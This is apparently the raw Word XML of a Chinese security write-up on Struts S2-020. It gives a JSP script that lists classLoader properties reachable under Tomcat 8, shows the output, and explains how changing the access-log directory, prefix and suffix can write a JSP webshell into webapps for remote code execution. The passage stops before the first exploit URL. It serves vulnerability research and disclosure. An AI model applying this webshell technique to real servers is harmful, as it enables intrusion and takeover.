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EC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1D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F1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>作者：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>neobyte</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC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DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>时间：</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2014-04-03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC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DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Struts S2-020</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个通告已经公布有一段时间了。目前大家都知道这个漏洞可以造成</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、文件下载等危害，相信各大厂商也已经采取了相应的安全措施。今天是和大家分享一下对这个漏洞的一点研究，包括如何在</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat 8</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下导致</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，目的是抛砖引玉，有不足之处欢迎大家指出。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:jc w:val="left"/>
        <w:textAlignment w:val="baseline"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="404040"/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>属性列举</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRPr="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC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DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这个漏洞分析的一个难点在于：通过</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ognl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class.xx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这种方式来遍历属性时，得到的是实际运行环境中的动态</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，因此仅作静态分析是很困难的。例如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>classLoader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，在不同容器中就各不相同。于是我编写了一个小脚本来自动枚举这样的属性：（这段脚本只考虑了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>这些基本属性，未考虑数组等复杂的情况，实际情况</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下结果</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00DF1DEC">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>会更多）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&lt;%@ page language="java"</w:t>
      </w:r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import="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java.lang.reflect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.*"</w:t>
      </w:r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%&gt;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&lt;%!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public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void</w:t>
      </w:r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processClass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(Object instance,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javax.servlet.jsp.JspWriter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out,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java.util.HashSet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set, String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poc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try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Class&lt;?&gt; c = </w:t>
      </w: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instance.getClass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set.add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instance);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Method[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]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allMethods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=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c.getMethods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for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(Method m :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allMethods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 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(!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m.getName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().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startsWith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("set")) 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continue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(!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m.toGenericString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().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startsWith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("public")) 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continue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Class&lt;?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&gt;[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]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pType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  =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m.getParameterTypes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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pType.length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!=1) continue;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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pType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[0].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getName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().equals("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java.lang.String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")||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pType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[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0].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getName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().equals("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boolean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")||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pType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[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0].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getName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().equals("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int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")){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String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fieldName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= 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m.getName(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).substring(3,4).toLowerCase()+m.getName().substring(4);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out.print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poc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+"."+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fieldName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+ "&lt;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br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&gt;");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for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(Method m :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allMethods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 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(!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m.getName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().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startsWith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("get")) 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continue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(!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m.toGenericString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().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startsWith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("public")) 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continue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lastRenderedPageBreak/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}       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Class&lt;?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&gt;[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]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pType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  =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m.getParameterTypes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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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pType.length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!=0) continue;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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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m.getReturnType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() ==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Void.TYPE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 continue;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Object o = </w:t>
      </w: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m.invoke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instance);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o!=null)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if(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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set.contains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(o)) continue;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processClass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o,out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, set, poc+"."+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m.getName(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).substring(3,4).toLowerCase()+m.getName().substring(4));    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} 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 catch</w:t>
      </w:r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java.io.IOException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x) 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x.printStackTrace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 catch</w:t>
      </w:r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java.lang.IllegalAccessException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x) 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x.printStackTrace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 catch</w:t>
      </w:r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java.lang.reflect.InvocationTargetException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x) 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x.printStackTrace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}   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%&gt;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&lt;%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java.util.HashSet</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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set = new</w:t>
      </w:r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java.util.HashSet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&lt;Object&gt;();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String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poc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= "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";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example.HelloWorld</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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action = new</w:t>
      </w:r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example.HelloWorld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processClass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action.getClass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().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getClassLoader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(),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out,set,poc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%&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007A5775" w:rsidRDefault="00DF1DEC" w:rsidP="00E413A6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>tomcat 8.0.3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>下</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Struts2.3.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>blank app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>中执行这段</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888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888888"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，输出结果如下：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（省略部分非相关属性）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class.classLoader.resources.context.parent.pipeline.first.encoding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class.classLoader.resources.context.parent.pipeline.first.directory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class.classLoader.resources.context.parent.pipeline.first.checkExists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class.classLoader.resources.context.parent.pipeline.first.renameOnRotate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class.classLoader.resources.context.parent.pipeline.first.fileDateFormat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class.classLoader.resources.context.parent.pipeline.first.prefix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class.classLoader.resources.context.parent.pipeline.first.rotatable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class.classLoader.resources.context.parent.pipeline.first.buffered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class.classLoader.resources.context.parent.pipeline.first.suffix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class.classLoader.resources.context.parent.pipeline.first.locale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class.classLoader.resources.context.parent.pipeline.first.requestAttributesEnabled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class.classLoader.resources.context.parent.pipeline.first.enabled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class.classLoader.resources.context.parent.pipeline.first.conditionUnless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lastRenderedPageBreak/>
        <w:t>class.classLoader.resources.context.parent.pipeline.first.conditionIf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class.classLoader.resources.context.parent.pipeline.first.pattern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class.classLoader.resources.context.parent.pipeline.first.condition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class.classLoader.resources.context.parent.pipeline.first.asyncSupported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class.classLoader.resources.context.parent.pipeline.first.domain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class.classLoader.resources.context.parent.pipeline.first.next.asyncSupported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class.classLoader.resources.context.parent.pipeline.first.next.domain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class.classLoader.resources.context.parent.pipeline.first.next.next.asyncSupported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class.classLoader.resources.context.parent.pipeline.first.next.next.domain</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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这意味着</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat 8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下至少有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>200</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>多个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888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>、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int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类型的属性是可以操纵的，虽然可修改不一定会产生危害，但至少说明这个漏洞的潜在风险不小。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC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proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>2.POC</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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经过分析发现，通过下面的方法可以造成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webshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的效果，最终导致</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>RCE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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上面的属性中，有几个控制在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>上生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>access log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的文件名，其默认值如下：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class.classLoader.resources.context.parent.pipeline.first.directory =logs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class.classLoader.resources.context.parent.pipeline.first.prefix =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localhost_access_log</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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class.classLoader.resources.context.parent.pipeline.first.suffix = .txt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class.classLoader.resources.context.parent.pipeline.first.fileDateFormat =.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yyyy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-mm-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dd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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默认情况下，生成的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>access log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>位于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> logs</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录（与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webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>平行）下，文件名是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>localhost_access_log.2014-03-09.txt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，但通过修改上面的属性值，可以导致在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webapps</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>目录下写入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jspwebshell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。具体步骤如下（以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>struts 2.3.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>下的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>blank app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>为例）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>访问下面的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url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="888888"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>来改变属性：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1DEC" w:rsidRDefault="00DF1DEC" w:rsidP="00DF1DEC">
      <w:pPr>
        <w:pStyle w:val="a8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hyperlink r:id="rId8" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a9"/>
            <w:rFonts w:ascii="inherit" w:hAnsi="inherit" w:cs="Arial"/>
            <w:color w:val="337AB7"/>
            <w:sz w:val="21"/>
            <w:szCs w:val="21"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          </w:rPr>
